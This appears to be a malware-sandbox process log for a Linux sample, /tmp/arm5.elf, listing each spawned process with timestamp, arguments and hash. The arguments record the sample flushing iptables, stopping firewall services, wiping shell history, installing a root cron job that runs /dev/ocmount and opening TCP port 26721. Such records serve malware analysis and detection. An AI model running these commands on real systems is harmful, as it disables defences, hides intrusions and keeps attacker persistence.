                                                                                                  File size:996584 bytes
                                                                                                  MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                                  Start time (UTC):13:51:59
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/sbin/service
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:51:59
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/sbin/service
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:51:59
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/bin/systemctl
                                                                                                  Arguments:systemctl list-unit-files --full --type=socket
                                                                                                  File size:996584 bytes
                                                                                                  MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                                  Start time (UTC):13:51:59
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/sbin/service
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:51:59
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/bin/sed
                                                                                                  Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
                                                                                                  File size:121288 bytes
                                                                                                  MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                                                                  Start time (UTC):13:52:02
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/bin/systemctl
                                                                                                  Arguments:systemctl stop iptables.service
                                                                                                  File size:996584 bytes
                                                                                                  MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                                  Start time (UTC):13:52:02
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/tmp/arm5.elf
                                                                                                  Arguments:-
                                                                                                  File size:4956856 bytes
                                                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                  Start time (UTC):13:52:02
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:sh -c "/sbin/iptables -F; /sbin/iptables -X"
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:02
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:02
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/sbin/iptables
                                                                                                  Arguments:/sbin/iptables -F
                                                                                                  File size:99296 bytes
                                                                                                  MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                                                  Start time (UTC):13:52:02
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:02
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/sbin/iptables
                                                                                                  Arguments:/sbin/iptables -X
                                                                                                  File size:99296 bytes
                                                                                                  MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                                                  Start time (UTC):13:52:02
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/tmp/arm5.elf
                                                                                                  Arguments:-
                                                                                                  File size:4956856 bytes
                                                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                  Start time (UTC):13:52:02
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:sh -c "service firewall stop"
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:02
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:02
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/sbin/service
                                                                                                  Arguments:service firewall stop
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:02
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/sbin/service
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:02
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/bin/basename
                                                                                                  Arguments:basename /usr/sbin/service
                                                                                                  File size:39256 bytes
                                                                                                  MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                                                                  Start time (UTC):13:52:02
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/sbin/service
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:02
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/bin/basename
                                                                                                  Arguments:basename /usr/sbin/service
                                                                                                  File size:39256 bytes
                                                                                                  MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                                                                  Start time (UTC):13:52:02
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/sbin/service
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:02
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/bin/systemctl
                                                                                                  Arguments:systemctl --quiet is-active multi-user.target
                                                                                                  File size:996584 bytes
                                                                                                  MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                                  Start time (UTC):13:52:02
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/sbin/service
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:02
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/sbin/service
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:02
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/bin/systemctl
                                                                                                  Arguments:systemctl list-unit-files --full --type=socket
                                                                                                  File size:996584 bytes
                                                                                                  MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                                  Start time (UTC):13:52:02
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/sbin/service
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:02
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/bin/sed
                                                                                                  Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
                                                                                                  File size:121288 bytes
                                                                                                  MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                                                                  Start time (UTC):13:52:04
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/bin/systemctl
                                                                                                  Arguments:systemctl stop firewall.service
                                                                                                  File size:996584 bytes
                                                                                                  MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                                  Start time (UTC):13:52:04
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/tmp/arm5.elf
                                                                                                  Arguments:-
                                                                                                  File size:4956856 bytes
                                                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                  Start time (UTC):13:52:04
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:sh -c "history -c"
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:04
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/tmp/arm5.elf
                                                                                                  Arguments:-
                                                                                                  File size:4956856 bytes
                                                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                  Start time (UTC):13:52:04
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:sh -c "rm -rf ~/.bash_history"
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:04
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:04
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/bin/rm
                                                                                                  Arguments:rm -rf /root/.bash_history
                                                                                                  File size:72056 bytes
                                                                                                  MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                                                  Start time (UTC):13:52:04
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/tmp/arm5.elf
                                                                                                  Arguments:-
                                                                                                  File size:4956856 bytes
                                                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                  Start time (UTC):13:52:04
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:sh -c "history -w"
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:04
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/tmp/arm5.elf
                                                                                                  Arguments:-
                                                                                                  File size:4956856 bytes
                                                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                  Start time (UTC):13:52:04
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/tmp/arm5.elf
                                                                                                  Arguments:-
                                                                                                  File size:4956856 bytes
                                                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                  Start time (UTC):13:52:04
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/tmp/arm5.elf
                                                                                                  Arguments:-
                                                                                                  File size:4956856 bytes
                                                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                  Start time (UTC):13:52:05
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/tmp/arm5.elf
                                                                                                  Arguments:-
                                                                                                  File size:4956856 bytes
                                                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                  Start time (UTC):13:52:05
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/tmp/arm5.elf
                                                                                                  Arguments:-
                                                                                                  File size:4956856 bytes
                                                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                  Start time (UTC):13:52:05
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:sh -c "chmod +x /dev/ocmount"
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:05
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:05
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/bin/chmod
                                                                                                  Arguments:chmod +x /dev/ocmount
                                                                                                  File size:63864 bytes
                                                                                                  MD5 hash:739483b900c045ae1374d6f53a86a279

                                                                                                  Start time (UTC):13:52:05
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/tmp/arm5.elf
                                                                                                  Arguments:-
                                                                                                  File size:4956856 bytes
                                                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                  Start time (UTC):13:52:05
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:sh -c "echo '* * * * * root /bin/bash /dev/ocmount' > /etc/cron.d/mount.sh"
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:05
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/tmp/arm5.elf
                                                                                                  Arguments:-
                                                                                                  File size:4956856 bytes
                                                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                  Start time (UTC):13:52:05
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:sh -c /dev/ocmount
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:06
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:17
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/tmp/arm5.elf
                                                                                                  Arguments:-
                                                                                                  File size:4956856 bytes
                                                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                  Start time (UTC):13:52:17
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/tmp/arm5.elf
                                                                                                  Arguments:-
                                                                                                  File size:4956856 bytes
                                                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                  Start time (UTC):13:52:17
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:17
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:17
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/sbin/iptables
                                                                                                  Arguments:iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
                                                                                                  File size:99296 bytes
                                                                                                  MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                                                  Start time (UTC):13:52:18
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/tmp/arm5.elf
                                                                                                  Arguments:-
                                                                                                  File size:4956856 bytes
                                                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                  Start time (UTC):13:52:18
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:18
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:18
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/busybox
                                                                                                  Arguments:/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
                                                                                                  File size:2172376 bytes
                                                                                                  MD5 hash:70584dffe9cb0309eb22ba78aa54bcdc

                                                                                                  Start time (UTC):13:52:18
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/tmp/arm5.elf
                                                                                                  Arguments:-
                                                                                                  File size:4956856 bytes
                                                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                  Start time (UTC):13:52:18
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:18
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:18
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/tmp/arm5.elf
                                                                                                  Arguments:-
                                                                                                  File size:4956856 bytes
                                                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                  Start time (UTC):13:52:18
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:18
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:18
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/tmp/arm5.elf
                                                                                                  Arguments:-
                                                                                                  File size:4956856 bytes
                                                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                  Start time (UTC):13:52:18
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:18
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:18
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/bin/busybox
                                                                                                  Arguments:busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
                                                                                                  File size:2172376 bytes
                                                                                                  MD5 hash:70584dffe9cb0309eb22ba78aa54bcdc

                                                                                                  Start time (UTC):13:52:17
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/tmp/arm5.elf
                                                                                                  Arguments:-
                                                                                                  File size:4956856 bytes
                                                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                  Start time (UTC):13:52:17
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/tmp/arm5.elf
                                                                                                  Arguments:-
                                                                                                  File size:4956856 bytes
                                                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                  Start time (UTC):13:52:17
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/tmp/arm5.elf
                                                                                                  Arguments:-
                                                                                                  File size:4956856 bytes
                                                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                  Start time (UTC):13:52:16
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/tmp/arm5.elf
                                                                                                  Arguments:-
                                                                                                  File size:4956856 bytes
                                                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                  Start time (UTC):13:52:16
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/tmp/arm5.elf
                                                                                                  Arguments:-
                                                                                                  File size:4956856 bytes
                                                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                  Start time (UTC):13:52:16
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:16
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:16
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/sbin/iptables
                                                                                                  Arguments:iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
                                                                                                  File size:99296 bytes
                                                                                                  MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                                                  Start time (UTC):13:52:17
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/tmp/arm5.elf
                                                                                                  Arguments:-
                                                                                                  File size:4956856 bytes
                                                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                  Start time (UTC):13:52:17
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:17
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:17
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/busybox
                                                                                                  Arguments:/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
                                                                                                  File size:2172376 bytes
                                                                                                  MD5 hash:70584dffe9cb0309eb22ba78aa54bcdc

                                                                                                  Start time (UTC):13:52:17
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/tmp/arm5.elf
                                                                                                  Arguments:-
                                                                                                  File size:4956856 bytes
                                                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                  Start time (UTC):13:52:17
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:17
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:17
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/tmp/arm5.elf
                                                                                                  Arguments:-
                                                                                                  File size:4956856 bytes
                                                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                  Start time (UTC):13:52:17
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:17
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:18
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/tmp/arm5.elf
                                                                                                  Arguments:-
                                                                                                  File size:4956856 bytes
                                                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                  Start time (UTC):13:52:18
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:18
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:18
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/bin/busybox
                                                                                                  Arguments:busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
                                                                                                  File size:2172376 bytes
                                                                                                  MD5 hash:70584dffe9cb0309eb22ba78aa54bcdc

                                                                                                  Start time (UTC):13:52:16
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/tmp/arm5.elf
                                                                                                  Arguments:-
                                                                                                  File size:4956856 bytes
                                                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                  Start time (UTC):13:52:16
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/tmp/arm5.elf
                                                                                                  Arguments:-
                                                                                                  File size:4956856 bytes
                                                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                  Start time (UTC):13:52:16
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/tmp/arm5.elf
                                                                                                  Arguments:-
                                                                                                  File size:4956856 bytes
                                                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                  Start time (UTC):13:52:05
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/libexec/gnome-session-binary
                                                                                                  Arguments:-
                                                                                                  File size:334664 bytes
                                                                                                  MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                                                                  Start time (UTC):13:52:05
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-sharing
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:05
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/libexec/gsd-sharing
                                                                                                  Arguments:/usr/libexec/gsd-sharing
                                                                                                  File size:35424 bytes
                                                                                                  MD5 hash:e29d9025d98590fbb69f89fdbd4438b3

                                                                                                  Start time (UTC):13:52:05
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/lib/systemd/systemd
                                                                                                  Arguments:-
                                                                                                  File size:1620224 bytes
                                                                                                  MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                                  Start time (UTC):13:52:05
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/lib/upower/upowerd
                                                                                                  Arguments:/usr/lib/upower/upowerd
                                                                                                  File size:260328 bytes
                                                                                                  MD5 hash:1253eea2fe5fe4017069664284e326cd

                                                                                                  Start time (UTC):13:52:05
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/lib/systemd/systemd
                                                                                                  Arguments:-
                                                                                                  File size:1620224 bytes
                                                                                                  MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                                  Start time (UTC):13:52:05
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/lib/upower/upowerd
                                                                                                  Arguments:/usr/lib/upower/upowerd
                                                                                                  File size:260328 bytes
                                                                                                  MD5 hash:1253eea2fe5fe4017069664284e326cd

                                                                                                  Start time (UTC):13:52:05
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/libexec/gnome-session-binary
                                                                                                  Arguments:-
                                                                                                  File size:334664 bytes
                                                                                                  MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                                                                  Start time (UTC):13:52:05
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-keyboard
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:52:06
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/libexec/gsd-keyboard
                                                                                                  Arguments:/usr/libexec/gsd-keyboard
                                                                                                  File size:39760 bytes
                                                                                                  MD5 hash:8e288fd17c80bb0a1148b964b2ac2279

                                                                                                  Start time (UTC):13:52:06
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/lib/systemd/systemd
                                                                                                  Arguments:-
                                                                                                  File size:1620224 bytes
                                                                                                  MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                                  Start time (UTC):13:52:06
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/lib/upower/upowerd
                                                                                                  Arguments:/usr/lib/upower/upowerd
                                                                                                  File size:260328 bytes
